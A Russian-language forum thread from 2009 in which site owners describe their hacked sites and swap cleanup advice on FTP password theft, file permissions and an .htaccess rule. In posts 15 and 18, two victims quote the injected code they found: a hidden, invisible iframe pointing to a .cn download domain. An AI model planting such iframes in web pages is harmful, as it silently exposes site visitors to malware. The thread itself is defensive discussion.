Сайт взломали. Удалось восстановить, но вопрос безопасности остался актуальным

Тема в разделе "Вопросы безопасности", создана пользователем liga, 22.01.2009.

  1. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Если есть известный клиент, значит и есть адреса где и что лежит, как говорится, самая безопасная Ось, это та, которая на фик ни кому не нужна, как Макинтош
     
  2. mike84
    Offline

    mike84 Недавно здесь

    Регистрация:
    25.11.2007
    Сообщения:
    210
    Симпатии:
    15
    Пол:
    Мужской
    Я вообще пользовался Дримвавером для редактирования и загрузки файлов - как думаете из него тоже могли
    угнать пароли?
    И насчет index.html - тоесть получается стоит все удалить и настроить htaccess чтобы не открывал папки?

    права проверил, поставил на папки не выше 755
     
  3. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 094
    Симпатии:
    158
    Пол:
    Мужской
    Поставить лицензионный Аутпост, грамотно его настроить и проблем нет вообще ;)
     
  4. infoman
    Offline

    infoman Пользователь

    Регистрация:
    28.08.2007
    Сообщения:
    581
    Симпатии:
    12
    Пол:
    Мужской
    ну наверное да :)
    сделай правило если ненайдён index.* то выдаём страницу 404
     
  5. liga
    Offline

    liga Пользователь

    Регистрация:
    21.10.2008
    Сообщения:
    495
    Симпатии:
    18
    Пол:
    Мужской
    В конце концов появился вирус, в файле входа в админ панель, антивирус сразу завизжал как только заметил это :(
     
  6. liga
    Offline

    liga Пользователь

    Регистрация:
    21.10.2008
    Сообщения:
    495
    Симпатии:
    18
    Пол:
    Мужской
    Так что же будет лучше сделать?
    Действие 1: удалить все файлы, сменить пароли, не сохранять пароли в фтп-клиенте, залить файлы из резервной копии.
    Действие 2: поставить настройки в хтачесс на 404 ошибку (но в данном случае вирус то все равно останется)
     
  7. agruts
    Offline

    agruts Группа поддержки

    Регистрация:
    01.03.2006
    Сообщения:
    609
    Симпатии:
    21
    Пол:
    Мужской
    А какой антивирь визжит? касперский поди? Так его хлебом некорми...

    зачем удалять все? можно просто перезалить из дистрибутива зараженные файлы и все.
    хотя первый раз вижу, чтобы вирус сидел в хтмл или пхп :)
    У тебя появился iframe в индексах, этот код откуда-то все равно вписывается. Можно порыться в файлах и найти исходник.
    Либо заменить все индексы, во всех директориях на дефолтные, т.е. - пустые + 644 (или даже 444).
     
  8. agruts
    Offline

    agruts Группа поддержки

    Регистрация:
    01.03.2006
    Сообщения:
    609
    Симпатии:
    21
    Пол:
    Мужской
    а не получится так, что ни одна страница не откроется? ибо при вызове Index.php получим 404

    сорри, слово ненайдён прочитал как найдён
     
    Последнее редактирование: 27.01.2009
  9. liga
    Offline

    liga Пользователь

    Регистрация:
    21.10.2008
    Сообщения:
    495
    Симпатии:
    18
    Пол:
    Мужской
    agruts, Визжит Аваст и Хром, были отредактированы все файлы, содержащие фрейм, а также были изменены логин и пароль на фтп доступ. Исходник я давно уже нашел, он вытаскивал все глобальные переменные в коде, а также создавал фреймы во всех файлах индекс.хтмл. Не знаю что будет дальше, но посмотрим.
     
  10. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Видимо визжит он той причине, что конекте к Ftp вирь начинает начинает работу (с твоей машины) А AVP тогда его и замечает
     
  11. infoman
    Offline

    infoman Пользователь

    Регистрация:
    28.08.2007
    Сообщения:
    581
    Симпатии:
    12
    Пол:
    Мужской
    трафик инспектор ?
    надо смотреть что на 21 порту делается......
     
  12. liga
    Offline

    liga Пользователь

    Регистрация:
    21.10.2008
    Сообщения:
    495
    Симпатии:
    18
    Пол:
    Мужской
    Сейчас вроде бы все оке :) спасибо всем за помощь!
     
  13. mike84
    Offline

    mike84 Недавно здесь

    Регистрация:
    25.11.2007
    Сообщения:
    210
    Симпатии:
    15
    Пол:
    Мужской
    напишите, как это должно записываться в htaccess ?
     
  14. infoman
    Offline

    infoman Пользователь

    Регистрация:
    28.08.2007
    Сообщения:
    581
    Симпатии:
    12
    Пол:
    Мужской
    1) спрашиваем у яши http://yandex.ru/yandsearch?text=htaccess&stpar2=/h0/tm36/s3&stpar4=/s3
    2) проваливаемся в http://www.iho.ru/faq/manual/htaccess.html
    видим читаем :
    Код (CODE):
    1. Как поставить запрет на отображение содержимого директории при отсутствии индексного файла?
    2.  
    3. Предположим, что у вас вся графика, используемая на сайте находится в директории img.
    4. Посетитель может набрать в адресной строке браузера эту директорию и увидеть список
    5.  всех ваших графических файлов. Конечно, это не нанесет вам урона, но можно и не дать
    6. такого просмотра посетителю. В .htaccess пишем:
    7.  
    8. Options -Indexes


    неверим проверяем :
    1) спрашиваем у яши http://yandex.ru/yandsearch?text=htaccess+Options+-Indexes+меню&stpar2=/h0/tm20/s1&stpar4=/s1
    2) проваливаемся http://www.htaccess.net.ru/doc/htaccess/Options.php
    читаем верим редактируем .htaccess радуемся запрету листинга
     
    Последнее редактирование: 03.02.2009
  15. Offline

    Egoz Пользователь

    Регистрация:
    01.06.2006
    Сообщения:
    60
    Симпатии:
    0
    Пол:
    Мужской
    тоже на днях, точнее 20.02, взломали на Джумле 1.0.15. В индексе сайта, админке, в html в папке Cache был вставлен код:
    "?<html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola65" width=1 height=1 style="visibility: hidden"></iframe></body></html>>"
    как только его убрал - все заработало. + на папку Cache доступ 777

    вот это да... во всех папках где есть index.html вставлен этот код и папки что проверил на данный момент имеют атрибуты доступа или 755 или 777
    напомните пожалуйсто где можно глянуть атрибуты для папок/файлов для joomla 1.0.15?
    вот это да... прям бесят меня те подонки, которые мне столько работы сделали.
    и подскажите основные моменты обезопасить себя от этой заразы.
    спасибо.
     
    Последнее редактирование: 24.02.2009
  16. liga
    Offline

    liga Пользователь

    Регистрация:
    21.10.2008
    Сообщения:
    495
    Симпатии:
    18
    Пол:
    Мужской
    Egoz, ну если например испльзуешь файлзилу, то просто заходишь в файлы сайта, правой кнопкой, атрибуты файла\папки. Все основные моменты уже были описаны в данной теме. Необходимо найти источник заразы, обезвредить его, удалить последствия, проставить нормальные атрибуты на файлы и папки и все будет также хорошо, как и у меня :)
     
  17. Bellatrix
    Offline

    Bellatrix Недавно здесь

    Регистрация:
    21.11.2008
    Сообщения:
    76
    Симпатии:
    5
    Пол:
    Мужской
    WinSCP почему-то падает постоянно и нестабильно держит связь (хотя Тотал её держит ещё хуже). И вряд ли лучше того же тотала, если в нём пароль хранить. У меня тоже спёрли пароли именно из Тотала год назад и изгадили все index.html, но, правда, только этим всё и ограничилось.
    Так что я теперь никогда не храню пароли в менеджерах, хотя это доставляет неудобства.
     
  18. Offline

    Ирина Ревин Недавно здесь

    Регистрация:
    19.08.2008
    Сообщения:
    74
    Симпатии:
    1
    Пол:
    Мужской
    Люди добрые!! помогите и мне пожалуйста.. а то я маленькая и хрупкая ламерша.. и знать не знаю как со всей этой заразой бороться..

    с неделю как на сайте завелся вирус, сначала просто при редактировании уже опублекованной статьи, редактор открывался в чистом виде и невозможно было зайти в хтмл-редактор, пока искала причину этих косяков.. поняла что таки вирус...
    вроде стандартный Downloader.JS.Psyme.ct, угнал пароли с ФТР и вписал в index свой хтмл-код в виде

    Код:
    <____html><body><i_______frame
    src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1
    style="visibility: hidden"></i____frame> </body></____html>
    я сменила все пароли доступа к фтп, к админке сайта, к админке хостинга.. потом пол ночи руками выковыривала из всех index вредоносный код, кстати говоря, проверка двумя антивирями.. не нашел таки вируса, значит новеньки.. вобщем почистила я все index..
    но сегодня захожу в админку, открываю одну из статей в редакторе а потом всю это страницу вместе с редактором, через браузер открываю в хтмл и нахожу там этот чертов код..
    в самом index.php сайта его нету, если открываю сайт в хтмл не заходя в админку тож нету..
    а вот когда открываю из админки (открывается в блокноте в файле index2(1)) то код там... ну как его искоренить?!!

    у меня несколько конкретных вопросов:
    1) как найти виновный во всем этом бреде фаил
    2) какие атрибуты и на какие папки поставить (777, 755 или...)
    3) что будет если залить на сайт файлы из дистрибутива??
    4) не прописалась ли какая зараза в ява-скриптах? и что еще нужно искать кроме данного зловредного кода?

    и может я что-то еще упустила?
     
  19. Bellatrix
    Offline

    Bellatrix Недавно здесь

    Регистрация:
    21.11.2008
    Сообщения:
    76
    Симпатии:
    5
    Пол:
    Мужской
    А сам компьютер хорошо почистила?
    Каким антивирусником пользуешься и браузером?
     
  20. Offline

    Ирина Ревин Недавно здесь

    Регистрация:
    19.08.2008
    Сообщения:
    74
    Симпатии:
    1
    Пол:
    Мужской
    чистила комп Авирой, каспером и д. вебом..)
    браузер опера, маззила и ИЕ, во всех чистила хеши
     

Поделиться этой страницей

Загрузка...